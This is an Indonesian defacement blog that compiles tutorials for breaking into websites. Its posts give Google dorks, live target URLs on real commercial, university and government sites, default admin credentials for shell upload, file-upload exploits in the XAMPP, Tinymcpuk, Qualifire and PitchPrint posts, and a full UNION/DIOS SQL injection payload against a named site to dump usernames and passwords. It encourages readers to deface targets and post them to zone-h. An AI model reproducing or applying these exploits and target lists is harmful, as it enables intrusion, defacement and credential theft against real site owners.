Xampp Local Write Access + Live Target

Assalamualaikum Wr. Wb.

Deface Poc Xampp Local Write Access - Halo sobat kacang. Kali ini, saya akan memberikan tutorial deface yang menurut saya paling easy, Lebih easy dari kindeditor. Cuman bedanya poc ini bisa dimirorin di zone-h. Kalian tau zone-h kan? Kalo Kalian gk tau kalian bisa cari tau disini.

Banyak defacer yang ngepush zone-h dengan poc xampp local write access. Kali ini gw juga udah nyediain puluhan live target. Semuanya fresh zone-h, cuman harus nunggu redefacement saja.

Oke langsung aja.

- Dork :
inurl:/security/lang.php
inurl:/xampp/lang.php

kembangin lagi gan

- Exploit
site.com/xampp/lang.php?Hacked_By_rizki ( untuk dir xampp )
site.com/security/lang.php?Hacked_By_rizki ( untuk dir security )

Note : "Hacked_By_Rizki" bisa diubah dengan nick kalian masing - masing.

- Langkah-langkah
1. Dorking dulu dengan dork yang sudah saya sediakan diatas atau jika kalian malas dorking, kalian bisa menggunakan live target yang sudah saya sediakan dibawah.
2. Jika sudah mendapatkan sitenya, kalian beri exploit yang sudah tersedia diatas.
Contoh :
http://site.com/xampp/lang.php?hacked_by_rizki ( dir xampp )
http://site.com/security/lang.php?hacked_by_rizki ( dir security )
3. Jika berhasil akan seperti gambar dibawah ini.
Gambar :
Gambar 1 ( Xampp Local Write Access )

4. Preview :
site.com/xampp/lang.tmp ( untuk dir xampp )
site.com/security/lang.tmp ( untuk dir security )
Gambar :
Gambar 2 ( Xampp Local Write Access )

5. Jika sudah, mirorin di zone-h :D

- Live Target
http://fleischhacker-homedefi.biz/xampp/lang.php?hacked_by_rizki
http://metrologi.kemendag.go.id/xampp/lang.php?hacked_by_rizki
https://www.ftsm.ukm.my/xampp/lang.php?hacked_by_rizki
http://a-pack.co.id/xampp/lang.php?hacked_by_rizki
http://online-gen.wbpdcl.co.in/xampp/lang.php?hacked_by_rizki
https://www.bombayworli.com/xampp/lang.php?hacked_by_rizki
https://www.xingyue.com/xampp/lang.php?hacked_by_rizki
https://www.crick99.com/xampp/lang.php?hacked_by_rizki
http://www.callbiz.com/xampp/lang.php?hacked_by_rizki

Mau lebih? usaha dong xixixi

Semoga bermanfaat.
Thank's To : Banyumas Cyber Team

-Adm1n

Deface Poc Backdoor Account Vulnerability


Assalamualaikum wr.wb. Halo gan, kembali lagi di Blog KacangCanggih hehe. Sorry jarang update artikel dikarenakan saya sibuk ngurusin sekolah. Hari ini saya akan memberikan tutor deface metode Backdoor Account Vulnerability. Oke langsung saja ke step by stepnya.

Dork
inurl:/amssplus/ intitle:"AMSS++"  
Kembangin Dorknya Maz
Account
User = admin
Password = 1234 
Tutorial

  • Kalian dorking dulu di search engine kesukaan kalian. 
  • Kalian coba login pake user dan pass diatas, jika masuk ke dashboard admin, berarti vuln. 
  • Silahkan kalian translate webnya dulu ke bahasa Indonesia, lalu cari menu informasi dasar guru & staf. 

  • Kemudian pilih Guru dan Personel saat ini. 

  • Setelah diklik, maka akan muncul list berupa data dan informasi guru/staf. 

  • Jika kalian ingin upload shell, kalian bisa buat data/info baru. 
  • Lalu klik gambar dua orang > klik kanan gambar rusak > buka di tab baru. 
  • Done! Shell Uploaded 
Terimakasih telah mmengunjungi Blog Kacang Canggih. Jangan lupa untuk membagikan artikel ini kepada temen temen kamu xD

Deface Poc Tinymcpuk File Upload


[+] Exploit Title = Tinymcpuk
[+] Author = KingSkrupellos
[+] Team = Cyberizm.Org Digital Security Team
[+] Google Dork =
Created by media tech indonesia
Created by media tech indonesia inurl:/statis-1 intext:whatsapp
Selebihnya use your brain :)
[+] Exploit = site.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
[+] Tutorial =
1. Langkah pertama, kalian dorking dulu dengan menggunakan dork yang telah saya sediakan di atas pada search engine kesukaan kalian.
2. Biasanya website yang vuln tinymcpuk adalah website daihatsu, suzuki, toyota, dan lain - lain.
3. Jika sudah menemukan website yang kira - kira vuln tinymcpuk, kalian kemudian tambahkan exploit yang saya berikan diatas dibelakang URL website.
4. Selanjutnya, klik "Pilih File" dan kalian upload script deface kalian berextensi php.fla atau html.fla
Gambar :

5. Cara akses filenya gimana gan? site.com/tinymcpuk/gambar/Flash/scriptdefacekamu.php.fla

Live Target = http://daihatsubangkalan.com

Gimana? Mudah bukan? Tinggal mirorin deh.. Jika kalian ingin request tutor, cukup komen postingan diblog ini atau bisa hubungi kami lewat halaman contact diblog ini. There a problem? Google Your Friend!

-Adm1n

WordPress Themes Qualifire CSRF File Upload


[+] Exploit Title = WordPress Themes Qualifire CSRF File Upload
[+] Google Dork =

  • inurl:/wp-content/themes/qualifire
  • index of / wp-content/themes/qualifire
[+] Exploit = site.com/[path]/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
[+] Tutorial 
1. Dorking dulu menggunakan dork yang telah saya sediakan di atas pada search engine kesukaan kalian. 
2. Jika sudah menemukan target, tambahkan exploit seperti di atas di belakang URL website. Vulnerability? Tampilan website blank! 
3. Masuk ke CSRF Online banyak kok di google, tinggal kalian cari sendiri h3h3 :'v
4. Isi kolom pertama dengan target website yang vuln, isi kolom kedua dengan postfile "Filedata" lalu kunci target tersebut. 


5. Upload file kalian yang ber - extensi txt, jpg, png, gif kalau lagi hoki bisa upload shell :'3 
6. Akses filenya gimana gan? http://site.com/[path]/filekalian.txt atau http://site.com/filekalian.txt

Live Target = http://www.hintofsaffron.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Nah, gimana gan, so easy kan? :v Jika kalian ingin request tutor tinggal comment aja di kolom komentar. There a problem? Google Your Friend! 

Pendaftaran Kontributor Indonesian sites BUG File Upload


[+] Exploit Title = Pendaftaran Kontributor Indonesian sites BUG File Upload
[+] Author = Negat1ve
[+] Team = -1 and Electronic ThunderBolt Team
[+] Dork =
inurl:/kontributor intext:Terima kasih
inurl:/kontributor site:id
inurl:/kontributor site:net
inurl:/kontributor site:com
[+] Tutorial
1. Langkah pertama, kalian dorking dengan dork yang telah saya beri tadi.
2. Setelah itu, kalian login dengan email (email palsu juga gk apa apa), password, dll.
Gambar :

Maaf ya, banyak yang saya sensor h3h3 :v
3. Selanjutnya, isi security code, dan klik "Daftar Sekarang"
Gambar :

4. Selanjutnya kalian akan masuk pada halaman dashboard.
5. Lalu klik "Tambahkan Data"
Gambar :

6. Selanjutnya, terserah kalian mau di jso (Javascript Overlay) atau apalah itu.
7. Tinggal mirorin :)

Live Target :
http://dayabanten.com/kontributor

Nah, gimana pembahasan saya kali ini? Mudah bukan? Jika kalian ingin request, silahkan hubungi kami dikolom komentar atau pada halaman contact blog ini. Good Luck! There a problem? Google Your Friend!

-Admin

WordPress Plugin PitchPrint Arbitrary File Upload


WordPress Plugins PitchPrint rentan terhadap kerentanan yang memungkinkan penyerang mengunggah file sewenang-wenang karena aplikasi gagal memverifikasi dengan benar input yang diberikan pengguna. Penyerang dapat memanfaatkan kerentanan ini untuk mengunggah kode atau file sewenang-wenang dan menjalankannya dalam konteks proses server web.

[+] Google Dork = inurl:/wp-content/plugins/pitchprint/
[+] Exploit = /wp-content/plugins/pitchprint/uploader/
[+] CRSF =  Touch Me :*
[+] Only For File Types = jpg, png, jpeg, gif.
[+] Tutorial =

  • Dorking dulu dork yang telah saya sediakan diatas pada search engine kesayangan kalian, kalau bisa kembangin dorknya h3h3 :v 
  • Jika sudah mendapatkan target, tambahkan exploit diatas di belakang URL website. Vulnerability? See the picture! 


  • Masuk ke CSRF. Isi kolom pertama dengan URL website, isi kolom kedua dengan post file files[] 
  • Upload file kalian. Jika sudah terupload maka tampilan websitenya seperti gambar di bawah ini. 


  • Akses filenya gimana gan? http://site.com/wp-content/plugins/pitchprint/uploader/files/filekalian.jpg 

Itu saja tutorial dari saya, kurang lebihnya saya minta maaf jika terjadi kesalahan kata/kalimat yang tidak pantas. Terus kunjungi Blog KacangCanggih untuk mendapatkan informasi menarik lainnya. 

Cara Deface SQLi dengan Dios (Dump In One Shot)


Ok, setelah saya memberikan daftar Dork Fresh SQLi 2019, sekarang giliran kita akan mempraktekannya.

Apa itu SQLi?
SQLi adalah singkatan dari Stuctured Query Language Injection. Kegiatan SQLi ini memungkinkan para attacker untuk melihat table dan database pada suatu website.

Kegiatan ini terbilang cukup mudah, karena cuma tempel tempel dios saja. Dios adalah Dump In One Shot. Dengan "dios" inilah kamu dapat melihat column dan tablenya.

Mumpung disini saya udah mendapatkan website vuln SQLi - nya, kita akan coba eksekusi.

Live Target = http://iagcc.com/news.php?id=58

Cara Deface SQLi dengan Dios (Dump In One Shot)
1. Oke, langkah pertama kalian dorking sendiri, dengan dork yang sudah saya berikan dipostingan sebelumnya atau dengan live target diatas.

2. Untuk Menentukan vuln atau tidaknya, cukup kamu beri string atau quote (')
Contoh : http://iagcc.com/news.php?id=58'

3. Jika vuln web yang tadi kamu beri string akan muncul kata kata "You Have error an SQL bla.. bla.. bla.." entah apalah itu saya tidak hafal h3h3 :v

4. Lanjut kita bermain order by sampai eror.
Contoh :
http://iagcc.com/news.php?id=58+order+by+1-- (Normal)
http://iagcc.com/news.php?id=58+order+by+2-- (Normal)
http://iagcc.com/news.php?id=58+order+by+3-- (Normal)
http://iagcc.com/news.php?id=58+order+by+4--(Normal)
http://iagcc.com/news.php?id=58+order+by+5-- (Normal)
http://iagcc.com/news.php?id=58+order+by+6-- (Normal)
http://iagcc.com/news.php?id=58+order+by+7-- (Error)

5. Karena errornya pada angka 7, maka columnya ada 6.

6. Sekarang kita kasih union select sesuai column
Contoh :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--
Jangan lupa beri tanda (-) sebelum parameter GET (liat sebelum angka 58)

7. Setelah itu akan muncul angka ajaibnya. Pada web tadi angka ajaibnya ada pada angka 4. Karena angka ajaib ada di angka 4, maka kita akan masukkan diosnya.
Dios :
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Contoh :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6--

8. Maka akan muncul semua column dan tablenya. Liat gambar :

9. Selanjutnya tinggal kita dump yang column nya yang sekiranya berbau admin,users,dll seperti gambar diatas yang saya beri tanda panah.

10. Jadi, ngedump username dan passwordnya seperti ini :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,UserName,Password)),@),5,6--
11. Nah, sudah ketemu nih username dan passwordnya tinggal hash dan cari admin loginnya.
Gambar :

oke, demikian dulu pembahasan SQLi dengan dios. Semoga bermanfaat dan gunakan dengan bijak. Thank's.